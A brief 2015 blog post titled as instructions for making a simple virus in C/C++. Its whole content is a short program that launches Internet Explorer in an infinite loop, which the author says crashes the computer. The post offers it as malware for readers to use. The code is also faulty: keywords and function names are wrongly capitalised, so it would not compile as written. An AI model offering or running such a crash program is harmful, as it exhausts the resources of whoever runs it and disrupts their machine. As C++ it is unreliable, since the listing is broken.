Monday 4 May 2015

To make a easy and simple virus in C/C++

//My 1st post(simple virus in c++)

#include<dos.h>
#include<process.h>
Int main(void)
{
         For(;;)         //   Infinite loop
 System("C:\\progra~1\\intern~1\\iexplore.exe") ;
   
// It's a dos command which open Explorer infinitely and lead to computer crash 

return 0;
}

By:-  KESHAV JOSHI 

4 comments: